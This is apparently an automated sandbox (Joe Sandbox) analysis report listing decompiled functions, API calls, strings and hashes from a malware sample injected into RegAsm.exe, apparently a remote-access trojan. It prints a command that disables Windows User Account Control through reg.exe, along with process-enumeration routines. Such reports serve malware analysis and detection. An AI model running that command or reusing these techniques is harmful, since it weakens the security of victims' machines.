                                                          • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                                          • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                                          • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6AB
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                                          • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040A6EE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleSizeSleep
                                                          • String ID: XQG
                                                          • API String ID: 1958988193-3606453820
                                                          • Opcode ID: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                                          • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                                          • Opcode Fuzzy Hash: ed692bf81f71d99d64d0e48405d0f3cb823898ebec9c5078a7592842c921da17
                                                          • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ClassCreateErrorLastRegisterWindow
                                                          • String ID: 0$MsgWindowClass
                                                          • API String ID: 2877667751-2410386613
                                                          • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                          • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                                          • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                          • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                                          APIs
                                                          • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                                          • CloseHandle.KERNEL32(?), ref: 004077AA
                                                          • CloseHandle.KERNEL32(?), ref: 004077AF
                                                          Strings
                                                          • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                                          • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreateProcess
                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                          • API String ID: 2922976086-4183131282
                                                          • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                          • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                                          • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                          • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                                          Strings
                                                          • SG, xrefs: 004076DA
                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 004076C4
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: SG$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          • API String ID: 0-643455097
                                                          • Opcode ID: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                          • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                                          • Opcode Fuzzy Hash: a5e5064d23fdb4a5105bb888b891a2001f99cf11455aefb2b8df45e89f9c3324
                                                          • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,?,?,004432EB,?,?,0044328B,?), ref: 0044336D
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                          • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                                          • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                          • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                          • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                          • CloseHandle.KERNEL32(?), ref: 00405140
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                          • String ID: KeepAlive | Disabled
                                                          • API String ID: 2993684571-305739064
                                                          • Opcode ID: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                          • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                                          • Opcode Fuzzy Hash: 11e320f67abdd95442ebe69be37ae07741154b3609cf10b7525108ad99fbffe3
                                                          • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                                          APIs
                                                            • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                                          • Sleep.KERNEL32(00002710), ref: 0041AE07
                                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                                          • String ID: Alarm triggered
                                                          • API String ID: 614609389-2816303416
                                                          • Opcode ID: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                          • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                                          • Opcode Fuzzy Hash: 458a9fadc2ddf1b51f38526f332080559b1bee2397fd5821544ba6e308cf5034
                                                          • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                                          • GetConsoleScreenBufferInfo.KERNEL32 ref: 0041CD6F
                                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C), ref: 0041CD7C
                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?), ref: 0041CD8F
                                                          Strings
                                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                          • API String ID: 3024135584-2418719853
                                                          • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                          • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                                          • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                          • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                          • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                                          • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                          • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                                          APIs
                                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          • _free.LIBCMT ref: 00444E06
                                                          • _free.LIBCMT ref: 00444E1D
                                                          • _free.LIBCMT ref: 00444E3C
                                                          • _free.LIBCMT ref: 00444E57
                                                          • _free.LIBCMT ref: 00444E6E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 3033488037-0
                                                          • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                                          • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                                          • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                                          • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                                          APIs
                                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                          • _free.LIBCMT ref: 004493BD
                                                            • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 00449589
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                          • String ID:
                                                          • API String ID: 1286116820-0
                                                          • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                          • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                                          • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                          • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                                          APIs
                                                            • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                            • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                                            • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,[), ref: 0041BFFA
                                                            • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,[), ref: 0041C005
                                                            • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                            • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 2180151492-0
                                                          • Opcode ID: 8b8cdfc602dbd14a3ce60d1437fbf9c616907d32c1791499aac7107a218dc19c
                                                          • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                                          • Opcode Fuzzy Hash: 8b8cdfc602dbd14a3ce60d1437fbf9c616907d32c1791499aac7107a218dc19c
                                                          • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                          • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                                          • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                          • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                                          • __alloca_probe_16.LIBCMT ref: 004511B1
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                                          • __freea.LIBCMT ref: 0045121D
                                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                          • String ID:
                                                          • API String ID: 313313983-0
                                                          • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                                          • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                                          • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                                          • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                          • _free.LIBCMT ref: 100071B8
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          • String ID:
                                                          • API String ID: 336800556-0
                                                          • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                          • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                          • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                          • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                                          • _free.LIBCMT ref: 0044F3BF
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          • String ID:
                                                          • API String ID: 336800556-0
                                                          • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                                          • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                                          • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                                          • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                          • _free.LIBCMT ref: 10005BB4
                                                          • _free.LIBCMT ref: 10005BDB
                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                          • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          • String ID:
                                                          • API String ID: 3170660625-0
                                                          • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                          • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                          • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                          • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                          APIs
                                                          • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                                          • _free.LIBCMT ref: 004482D3
                                                          • _free.LIBCMT ref: 004482FA
                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          • String ID:
                                                          • API String ID: 3170660625-0
                                                          • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                          • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                                          • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                          • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                                          APIs
                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
